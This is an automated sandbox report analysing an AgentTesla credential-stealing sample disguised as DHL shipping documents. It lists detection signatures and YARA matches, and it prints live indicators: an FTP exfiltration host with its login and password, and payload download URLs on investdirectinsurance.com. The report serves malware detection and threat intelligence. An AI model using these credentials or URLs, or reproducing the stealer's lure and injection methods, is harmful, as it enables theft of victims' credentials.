Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Shipping Documents 0016229753_PDF.exe

Overview

General Information

Sample name:DHL Shipping Documents 0016229753_PDF.exe
Analysis ID:1486782
MD5:c9bec29f669d714cd80e368748d7024c
SHA1:26cbf10c3901a2d9d1023daca9d1e70212c52ae6
SHA256:80c5e03de930503d62103dea57d6590454e442612a394a2b235eb614746e2b3a
Tags:AgentTeslaDHLexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL Shipping Documents 0016229753_PDF.exe (PID: 5836 cmdline: "C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe" MD5: C9BEC29F669D714CD80E368748D7024C)
    • MSBuild.exe (PID: 5764 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x318a3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31945:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x319cf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31a61:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31acb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31b3d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x31bd3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x31c63:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2ed90:$s2: GetPrivateProfileString
                  • 0x2e49a:$s3: get_OSFullName
                  • 0x2fa77:$s5: remove_Key
                  • 0x2fc14:$s5: remove_Key
                  • 0x30b16:$s6: FtpWebRequest
                  • 0x31885:$s7: logins
                  • 0x31e27:$s7: logins
                  • 0x34b98:$s7: logins
                  • 0x34c4a:$s7: logins
                  • 0x36582:$s7: logins
                  • 0x357ee:$s9: 1.85 (Hash, version 2, native byte-order)
                  3.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 23 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Suricata Signatures

                    Timestamp:2024-08-02T15:02:16.556150+0200
                    SID:2855542
                    Source Port:49709
                    Destination Port:47808
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-02T15:02:12.198468+0200
                    SID:2803270
                    Source Port:49707
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-02T15:02:10.477622+0200
                    SID:2803270
                    Source Port:49706
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-08-02T15:02:16.550510+0200
                    SID:2855542
                    Source Port:49709
                    Destination Port:47808
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-02T15:02:16.074554+0200
                    SID:2029927
                    Source Port:49708
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: DHL Shipping Documents 0016229753_PDF.exeAvira: detected
                    Found malware configuration
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
                    Multi AV Scanner detection for submitted file
                    Source: DHL Shipping Documents 0016229753_PDF.exeReversingLabs: Detection: 47%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49712 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.9:49706 version: TLS 1.2
                    Source: DHL Shipping Documents 0016229753_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: `.Pdb/> source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\cashout\Desktop\Outputs\Meazod.pdb source: DHL Shipping Documents 0016229753_PDF.exe
                    Source: Binary string: `.Pdb/ source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp
                    Source: global trafficTCP traffic: 192.168.2.9:49709 -> 108.179.234.136:47808
                    Source: Joe Sandbox ViewIP Address: 108.179.234.136 108.179.234.136
                    Source: Joe Sandbox ViewIP Address: 172.67.189.102 172.67.189.102
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknownFTP traffic detected: 108.179.234.136:21 -> 192.168.2.9:49708 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Mindwall.bl HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Pano.bl HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                    Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49712 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeCode function: 1_2_00007FF886E32072 InternetReadFile,1_2_00007FF886E32072
                    Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Mindwall.bl HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Pano.bl HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: investdirectinsurance.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.wapination.net
                    Source: MSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.wapination.net
                    Source: MSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: MSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wapination.net
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: DHL Shipping Documents 0016229753_PDF.exeString found in binary or memory: https://api.yookassa.ru/v3/
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/J~%
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/O~
                    Source: DHL Shipping Documents 0016229753_PDF.exeString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl(t
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.blwt
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl~t
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl&
                    Source: DHL Shipping Documents 0016229753_PDF.exeString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.blsC:
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.blx
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.9:49706 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, SKTzxzsJw.cs.Net Code: Fe9wfWKc5

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: DHL Shipping Documents 0016229753_PDF.exe
                    Sample has a suspicious name (potential lure to open the executable)
                    Source: DHL Shipping Documents 0016229753_PDF.exeStatic file information: Suspicious name
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeCode function: 1_2_00007FF886E30FF21_2_00007FF886E30FF2
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeCode function: 1_2_00007FF886E317501_2_00007FF886E31750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01359BC03_2_01359BC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01354A603_2_01354A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0135CE503_2_0135CE50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01353E483_2_01353E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_013541903_2_01354190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C56E83_2_060C56E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C00403_2_060C0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C3F603_2_060C3F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060CDC303_2_060CDC30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060CBD083_2_060CBD08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C9AE83_2_060C9AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C2AF83_2_060C2AF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C8B883_2_060C8B88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C324B3_2_060C324B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_060C50083_2_060C5008
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs DHL Shipping Documents 0016229753_PDF.exe
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs DHL Shipping Documents 0016229753_PDF.exe
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs DHL Shipping Documents 0016229753_PDF.exe
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417477623.000000001BBC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs DHL Shipping Documents 0016229753_PDF.exe
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: DHL Shipping Documents 0016229753_PDF.exe, Client.csSuspicious URL: 'https://api.yookassa.ru/v3/'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@2/2
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Mindwall[1].blJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                    Source: DHL Shipping Documents 0016229753_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DHL Shipping Documents 0016229753_PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: DHL Shipping Documents 0016229753_PDF.exeReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe "C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe"
